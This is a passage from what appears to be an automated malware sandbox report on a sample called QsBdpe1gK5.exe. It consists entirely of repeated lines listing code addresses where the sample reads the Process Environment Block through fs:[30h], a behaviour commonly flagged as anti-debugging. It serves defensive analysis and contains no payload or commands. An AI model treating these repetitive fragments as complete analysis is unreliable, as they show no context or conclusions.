                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01192000 mov eax, dword ptr fs:[00000030h]2_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01186030 mov eax, dword ptr fs:[00000030h]2_2_01186030
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EA020 mov eax, dword ptr fs:[00000030h]2_2_010EA020
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EC020 mov eax, dword ptr fs:[00000030h]2_2_010EC020
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176050 mov eax, dword ptr fs:[00000030h]2_2_01176050
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F2050 mov eax, dword ptr fs:[00000030h]2_2_010F2050
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111C073 mov eax, dword ptr fs:[00000030h]2_2_0111C073
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F208A mov eax, dword ptr fs:[00000030h]2_2_010F208A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B60B8 mov eax, dword ptr fs:[00000030h]2_2_011B60B8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B60B8 mov ecx, dword ptr fs:[00000030h]2_2_011B60B8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E80A0 mov eax, dword ptr fs:[00000030h]2_2_010E80A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011880A8 mov eax, dword ptr fs:[00000030h]2_2_011880A8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011720DE mov eax, dword ptr fs:[00000030h]2_2_011720DE
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011320F0 mov ecx, dword ptr fs:[00000030h]2_2_011320F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F80E9 mov eax, dword ptr fs:[00000030h]2_2_010F80E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EA0E3 mov ecx, dword ptr fs:[00000030h]2_2_010EA0E3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011760E0 mov eax, dword ptr fs:[00000030h]2_2_011760E0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EC0F0 mov eax, dword ptr fs:[00000030h]2_2_010EC0F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01110310 mov ecx, dword ptr fs:[00000030h]2_2_01110310
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A30B mov eax, dword ptr fs:[00000030h]2_2_0112A30B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A30B mov eax, dword ptr fs:[00000030h]2_2_0112A30B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A30B mov eax, dword ptr fs:[00000030h]2_2_0112A30B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EC310 mov ecx, dword ptr fs:[00000030h]2_2_010EC310
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C8324 mov eax, dword ptr fs:[00000030h]2_2_011C8324
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C8324 mov ecx, dword ptr fs:[00000030h]2_2_011C8324
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C8324 mov eax, dword ptr fs:[00000030h]2_2_011C8324
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C8324 mov eax, dword ptr fs:[00000030h]2_2_011C8324
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BA352 mov eax, dword ptr fs:[00000030h]2_2_011BA352
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01198350 mov ecx, dword ptr fs:[00000030h]2_2_01198350
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov eax, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov eax, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov eax, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov ecx, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov eax, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117035C mov eax, dword ptr fs:[00000030h]2_2_0117035C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C634F mov eax, dword ptr fs:[00000030h]2_2_011C634F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01172349 mov eax, dword ptr fs:[00000030h]2_2_01172349
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119437C mov eax, dword ptr fs:[00000030h]2_2_0119437C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE388 mov eax, dword ptr fs:[00000030h]2_2_010EE388
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE388 mov eax, dword ptr fs:[00000030h]2_2_010EE388
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE388 mov eax, dword ptr fs:[00000030h]2_2_010EE388
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E8397 mov eax, dword ptr fs:[00000030h]2_2_010E8397
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E8397 mov eax, dword ptr fs:[00000030h]2_2_010E8397
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E8397 mov eax, dword ptr fs:[00000030h]2_2_010E8397
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111438F mov eax, dword ptr fs:[00000030h]2_2_0111438F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111438F mov eax, dword ptr fs:[00000030h]2_2_0111438F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E3DB mov eax, dword ptr fs:[00000030h]2_2_0119E3DB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E3DB mov eax, dword ptr fs:[00000030h]2_2_0119E3DB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E3DB mov ecx, dword ptr fs:[00000030h]2_2_0119E3DB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119E3DB mov eax, dword ptr fs:[00000030h]2_2_0119E3DB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011943D4 mov eax, dword ptr fs:[00000030h]2_2_011943D4
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011943D4 mov eax, dword ptr fs:[00000030h]2_2_011943D4
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA3C0 mov eax, dword ptr fs:[00000030h]2_2_010FA3C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F83C0 mov eax, dword ptr fs:[00000030h]2_2_010F83C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F83C0 mov eax, dword ptr fs:[00000030h]2_2_010F83C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F83C0 mov eax, dword ptr fs:[00000030h]2_2_010F83C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F83C0 mov eax, dword ptr fs:[00000030h]2_2_010F83C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AC3CD mov eax, dword ptr fs:[00000030h]2_2_011AC3CD
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011763C0 mov eax, dword ptr fs:[00000030h]2_2_011763C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E3F0 mov eax, dword ptr fs:[00000030h]2_2_0110E3F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E3F0 mov eax, dword ptr fs:[00000030h]2_2_0110E3F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E3F0 mov eax, dword ptr fs:[00000030h]2_2_0110E3F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011263FF mov eax, dword ptr fs:[00000030h]2_2_011263FF
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011003E9 mov eax, dword ptr fs:[00000030h]2_2_011003E9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E823B mov eax, dword ptr fs:[00000030h]2_2_010E823B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C625D mov eax, dword ptr fs:[00000030h]2_2_011C625D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AA250 mov eax, dword ptr fs:[00000030h]2_2_011AA250
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AA250 mov eax, dword ptr fs:[00000030h]2_2_011AA250
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01178243 mov eax, dword ptr fs:[00000030h]2_2_01178243
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01178243 mov ecx, dword ptr fs:[00000030h]2_2_01178243
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6259 mov eax, dword ptr fs:[00000030h]2_2_010F6259
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EA250 mov eax, dword ptr fs:[00000030h]2_2_010EA250
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E826B mov eax, dword ptr fs:[00000030h]2_2_010E826B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A0274 mov eax, dword ptr fs:[00000030h]2_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F4260 mov eax, dword ptr fs:[00000030h]2_2_010F4260
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F4260 mov eax, dword ptr fs:[00000030h]2_2_010F4260
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F4260 mov eax, dword ptr fs:[00000030h]2_2_010F4260
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01170283 mov eax, dword ptr fs:[00000030h]2_2_01170283
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01170283 mov eax, dword ptr fs:[00000030h]2_2_01170283
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01170283 mov eax, dword ptr fs:[00000030h]2_2_01170283
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E284 mov eax, dword ptr fs:[00000030h]2_2_0112E284
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E284 mov eax, dword ptr fs:[00000030h]2_2_0112E284
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011002A0 mov eax, dword ptr fs:[00000030h]2_2_011002A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011002A0 mov eax, dword ptr fs:[00000030h]2_2_011002A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov eax, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov ecx, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov eax, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov eax, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov eax, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011862A0 mov eax, dword ptr fs:[00000030h]2_2_011862A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C62D6 mov eax, dword ptr fs:[00000030h]2_2_011C62D6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA2C3 mov eax, dword ptr fs:[00000030h]2_2_010FA2C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA2C3 mov eax, dword ptr fs:[00000030h]2_2_010FA2C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA2C3 mov eax, dword ptr fs:[00000030h]2_2_010FA2C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA2C3 mov eax, dword ptr fs:[00000030h]2_2_010FA2C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA2C3 mov eax, dword ptr fs:[00000030h]2_2_010FA2C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011002E1 mov eax, dword ptr fs:[00000030h]2_2_011002E1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011002E1 mov eax, dword ptr fs:[00000030h]2_2_011002E1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011002E1 mov eax, dword ptr fs:[00000030h]2_2_011002E1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01186500 mov eax, dword ptr fs:[00000030h]2_2_01186500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4500 mov eax, dword ptr fs:[00000030h]2_2_011C4500
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100535 mov eax, dword ptr fs:[00000030h]2_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E53E mov eax, dword ptr fs:[00000030h]2_2_0111E53E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E53E mov eax, dword ptr fs:[00000030h]2_2_0111E53E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E53E mov eax, dword ptr fs:[00000030h]2_2_0111E53E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E53E mov eax, dword ptr fs:[00000030h]2_2_0111E53E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E53E mov eax, dword ptr fs:[00000030h]2_2_0111E53E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F8550 mov eax, dword ptr fs:[00000030h]2_2_010F8550
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F8550 mov eax, dword ptr fs:[00000030h]2_2_010F8550
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112656A mov eax, dword ptr fs:[00000030h]2_2_0112656A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112656A mov eax, dword ptr fs:[00000030h]2_2_0112656A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112656A mov eax, dword ptr fs:[00000030h]2_2_0112656A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F2582 mov eax, dword ptr fs:[00000030h]2_2_010F2582
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F2582 mov ecx, dword ptr fs:[00000030h]2_2_010F2582
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E59C mov eax, dword ptr fs:[00000030h]2_2_0112E59C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01124588 mov eax, dword ptr fs:[00000030h]2_2_01124588
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011145B1 mov eax, dword ptr fs:[00000030h]2_2_011145B1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011145B1 mov eax, dword ptr fs:[00000030h]2_2_011145B1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011705A7 mov eax, dword ptr fs:[00000030h]2_2_011705A7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011705A7 mov eax, dword ptr fs:[00000030h]2_2_011705A7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011705A7 mov eax, dword ptr fs:[00000030h]2_2_011705A7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A5D0 mov eax, dword ptr fs:[00000030h]2_2_0112A5D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A5D0 mov eax, dword ptr fs:[00000030h]2_2_0112A5D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E5CF mov eax, dword ptr fs:[00000030h]2_2_0112E5CF
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E5CF mov eax, dword ptr fs:[00000030h]2_2_0112E5CF
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F65D0 mov eax, dword ptr fs:[00000030h]2_2_010F65D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F25E0 mov eax, dword ptr fs:[00000030h]2_2_010F25E0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112C5ED mov eax, dword ptr fs:[00000030h]2_2_0112C5ED
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112C5ED mov eax, dword ptr fs:[00000030h]2_2_0112C5ED
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01128402 mov eax, dword ptr fs:[00000030h]2_2_01128402
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01128402 mov eax, dword ptr fs:[00000030h]2_2_01128402
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01128402 mov eax, dword ptr fs:[00000030h]2_2_01128402
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EC427 mov eax, dword ptr fs:[00000030h]2_2_010EC427
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE420 mov eax, dword ptr fs:[00000030h]2_2_010EE420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE420 mov eax, dword ptr fs:[00000030h]2_2_010EE420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE420 mov eax, dword ptr fs:[00000030h]2_2_010EE420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111245A mov eax, dword ptr fs:[00000030h]2_2_0111245A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AA456 mov eax, dword ptr fs:[00000030h]2_2_011AA456
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E443 mov eax, dword ptr fs:[00000030h]2_2_0112E443
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E443 mov eax, dword ptr fs:[00000030h]2_2_0112E443
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E443 mov eax, dword ptr fs:[00000030h]2_2_0112E443
